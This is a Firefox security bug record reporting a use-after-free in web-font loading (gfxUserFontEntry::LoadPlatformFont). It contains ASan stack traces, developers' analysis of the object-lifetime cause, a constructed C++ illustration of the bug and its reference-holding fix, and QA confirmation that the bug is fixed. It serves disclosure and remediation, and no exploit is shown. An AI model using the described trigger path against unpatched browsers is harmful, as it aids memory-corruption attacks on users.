    #16 0x7f48126224ac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #17 0x7f48125d1cba in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1028:22
    #18 0x7f48125d3ad3 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1220:17
    #19 0x7f48125b4741 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #20 0x7f48125b4741 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #21 0x7f48125b2976 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #22 0x7f48125b96e4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #23 0x7f48155a6cc8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
    #24 0x7f4818441053 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6680:20
    #25 0x7f481844016c in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6480:7
    #26 0x7f4818445b77 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #27 0x7f480cf03c35 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3
    #28 0x7f480cf0282a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:896:14
    #29 0x7f480cefce70 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #30 0x7f480cf006e5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:618:5
    #31 0x7f480cf02374 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #32 0x7f480a655311 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
    #33 0x7f480e7dcbb8 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:10534:18
    #34 0x7f480e7dcbb8 in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10466

previously allocated by thread T0 (Web Content) here:
    #0 0x564c92e7ae03 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x564c92eafb6d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f481523e925 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:144:10
    #3 0x7f481523e925 in mozilla::dom::FontFaceSet::FontFaceSet(nsPIDOMWindowInner*, mozilla::dom::Document*) /builds/worker/workspace/build/src/layout/style/FontFaceSet.cpp:165
    #4 0x7f480e8584e6 in mozilla::dom::Document::Fonts() /builds/worker/workspace/build/src/dom/base/Document.cpp:14613:24
    #5 0x7f4815231bef in mozilla::dom::FontFace::Constructor(mozilla::dom::GlobalObject const&, nsTSubstring<char16_t> const&, mozilla::dom::StringOrArrayBufferOrArrayBufferView const&, mozilla::dom::FontFaceDescriptors const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/FontFace.cpp:168:52
    #6 0x7f48115eae3b in mozilla::dom::FontFace_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FontFaceBinding.cpp:1764:54
    #7 0x7f481961240d in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #8 0x7f481961240d in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:464
    #9 0x7f481961240d in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:657
    #10 0x7f48195ef0fd in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3078:16
    #11 0x7f48195d964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #12 0x7f4819614fcc in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:787:13
    #13 0x7f48197105f1 in EvalKernel(JSContext*, JS::Handle<JS::Value>, EvalType, js::AbstractFramePtr, JS::Handle<JSObject*>, unsigned char*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:326:10
    #14 0x7f481970fbd8 in js::IndirectEval(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:424:10
    #15 0x7f481960e7c5 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #16 0x7f481960e7c5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #17 0x7f48195ef238 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #18 0x7f48195ef238 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3087
    #19 0x7f48195d964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #20 0x7f481960f018 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #21 0x7f4819611462 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #22 0x7f481a28f548 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2655:10
    #23 0x7f4811330429 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
    #24 0x7f48126224ac in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #25 0x7f48126224ac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #26 0x7f48125d1cba in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1028:22
    #27 0x7f48125d3ad3 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1220:17
    #28 0x7f48125b4741 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #29 0x7f48125b4741 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #30 0x7f48125b2976 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #31 0x7f48125b96e4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #32 0x7f48155a6cc8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
    #33 0x7f4818441053 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6680:20
    #34 0x7f481844016c in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6480:7
    #35 0x7f4818445b77 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #36 0x7f480cf03c35 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:740:15 in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&)
Shadow bytes around the buggy address:
  0x0c1080006ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1080007000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080007010: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1080007020: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007030: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c1080007040: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007050: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080007060: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1080007070: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007080: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007090: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==23329==ABORTING
Attached file ASAN output
Attached file Junction-webfont.eot
Group: core-security → layout-core-security

[Tracking Requested - why for this release]: This code was recently introduced in bug 1490792.

Flags: needinfo?(cam)
Regressed by: 1490792
Keywords: regression

I believe this feature is preffed off by default as of https://hg.mozilla.org/mozilla-central/rev/597d2f60a811 ?

This is not explicitly set in the prefs.js I used

Yes, but I just landed a fix and preffed it on a few days ago.

Flags: needinfo?(cam)

Thanks for the report, Nils. I'll look into this.

Assignee: nobody → cam
Status: NEW → ASSIGNED

The issue is that the gfxUserFontSet can go away due to the old page being navigated away from, and that happens between the runnable being dispatched to the FontLoader thread, and that work completing and coming back to the main thread to continue with the platform font creation. We need to hold on to the gfxUserFontSet for the duration of that work to avoid that. (I decided to use bare NS_ADDREF / NS_RELEASE calls rather than adding seemingly unused RefPtr<gfxUserFontSet> arguments to the runnables.)
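The lifetime pattern described in that comment, as an added illustration that is not Mozilla's code: a work item is handed off to a loader thread while the only owner of the font set (the page) can be torn down by navigation before the work returns to the main thread. `FakeUserFontSet`, `Strong`, `LoadPlatformFontRunnable` and `SimulateFontLoad` are constructed stand-ins for gfxUserFontSet, RefPtr and the real runnable; a live-object registry stands in for ASan so the dangling pointer is reported as a value instead of being dereferenced.

```cpp
#include <cstdio>
#include <unordered_set>
#include <vector>

// Registry of live objects. It lets the example detect a dangling pointer
// and report a value a test can assert on, instead of reading freed memory
// the way the real bug did (which is what ASan flagged above).
static std::unordered_set<const void*> gLiveObjects;

static bool IsLive(const void* p) { return gLiveObjects.count(p) != 0; }

// Constructed stand-in for gfxUserFontSet: intrusively refcounted and
// owned by the page (in Firefox, via the document's FontFaceSet).
class FakeUserFontSet {
 public:
  FakeUserFontSet() { gLiveObjects.insert(this); }
  ~FakeUserFontSet() { gLiveObjects.erase(this); }
  void AddRef() { ++mRefCnt; }
  void Release() {
    if (--mRefCnt == 0) delete this;
  }
  void OnPlatformFontCreated() { ++mFontsCreated; }
  int FontsCreated() const { return mFontsCreated; }

 private:
  int mRefCnt = 0;  // single-threaded toy; the real class uses atomics
  int mFontsCreated = 0;
};

// Minimal strong-reference smart pointer (constructed; not Mozilla's
// RefPtr). Holding one keeps the target alive until it is dropped.
template <class T>
class Strong {
 public:
  Strong() = default;
  explicit Strong(T* p) : mPtr(p) { if (mPtr) mPtr->AddRef(); }
  Strong(const Strong& o) : Strong(o.mPtr) {}
  ~Strong() { if (mPtr) mPtr->Release(); }
  Strong& operator=(T* p) {
    if (p) p->AddRef();         // addref first: p may alias mPtr
    if (mPtr) mPtr->Release();
    mPtr = p;
    return *this;
  }
  Strong& operator=(const Strong& o) { return *this = o.mPtr; }
  T* get() const { return mPtr; }

 private:
  T* mPtr = nullptr;
};

// The work item dispatched to the font loader thread. The buggy shape
// carried only a raw pointer back to the font set; the fixed shape also
// keeps a strong reference for the whole dispatch-and-complete round trip.
struct LoadPlatformFontRunnable {
  FakeUserFontSet* mRawFontSet = nullptr;
  Strong<FakeUserFontSet> mKeepAlive;  // left empty in the buggy variant
  std::vector<unsigned char> mFontData;
  bool mSanitizedOk = false;

  // Step 1: runs on the loader thread. It only touches the font bytes,
  // never the font set, so nothing here notices if the page goes away.
  void RunOnLoaderThread() {
    mSanitizedOk = mFontData.size() >= 4 && mFontData[0] == 'O' &&
                   mFontData[1] == 'T' && mFontData[2] == 'T' &&
                   mFontData[3] == 'O';
  }

  // Step 2: back on the main thread, continue with platform font creation.
  // This is the point where the ASan report's read happened.
  // Returns false if the font set has already been destroyed.
  bool CompleteOnMainThread() {
    if (!IsLive(mRawFontSet)) return false;  // would be a use-after-free
    if (mSanitizedOk) mRawFontSet->OnPlatformFontCreated();
    return true;
  }
};

struct Outcome {
  bool completionSawLiveFontSet;  // false == the bug reproduced
  bool fontSetFreedAtEnd;         // true == the fix did not leak it
};

// Replays the sequence from the comment: dispatch the runnable, let the old
// page navigate away and drop its only reference, then run the main-thread
// completion. The loader-thread step is called inline because ordering, not
// timing, is what matters here.
Outcome SimulateFontLoad(bool holdStrongRefInRunnable) {
  const FakeUserFontSet* address = nullptr;
  bool sawLive = false;
  {
    Strong<FakeUserFontSet> pageOwned(new FakeUserFontSet());
    address = pageOwned.get();

    LoadPlatformFontRunnable runnable;
    runnable.mRawFontSet = pageOwned.get();
    if (holdStrongRefInRunnable) runnable.mKeepAlive = pageOwned.get();
    runnable.mFontData = {'O', 'T', 'T', 'O', 0, 1, 0, 0};  // constructed header

    runnable.RunOnLoaderThread();  // the "dispatched" work
    pageOwned = nullptr;           // navigation: page releases the font set
    sawLive = runnable.CompleteOnMainThread();
  }  // runnable destroyed here; with the fix this is the final Release()
  return Outcome{sawLive, !IsLive(address)};
}

int main() {
  Outcome buggy = SimulateFontLoad(false);
  Outcome fixed = SimulateFontLoad(true);
  std::printf("raw pointer only: live at completion = %s\n",
              buggy.completionSawLiveFontSet ? "yes" : "no (UAF)");
  std::printf("strong ref held:  live at completion = %s, freed after = %s\n",
              fixed.completionSawLiveFontSet ? "yes" : "no",
              fixed.fontSetFreedAtEnd ? "yes" : "no");
  return 0;
}
```

The example uses a smart-pointer member on the runnable; the landed fix, as the comment says, uses bare NS_ADDREF / NS_RELEASE calls around the same round trip instead of adding a RefPtr argument. Either way the property to check is the same: the strong reference is taken before dispatch and dropped only after the main-thread completion step has finished with the object, and the object is still freed once the runnable goes away.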

(In reply to Cameron McCormack (:heycam) from comment #11)

(rookie mistake using NS_RELEASE)

Oops .... yeah, sorry - I wasn't alert to that either!

Group: layout-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 5 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla69
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]

I have managed to reproduce this issue using Firefox 69.0a1 (BuildId:20190613095424) fuzzing asan build.

This issue is verified fixed using Firefox 69.0b7 (20190724012138) and Firefox 70.0a1 (BuildId:20190725035331) fuzzing asan build on Ubuntu 18.04 64bit.

Status: RESOLVED → VERIFIED
Flags: qe-verify+
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
Has Regression Range: --- → yes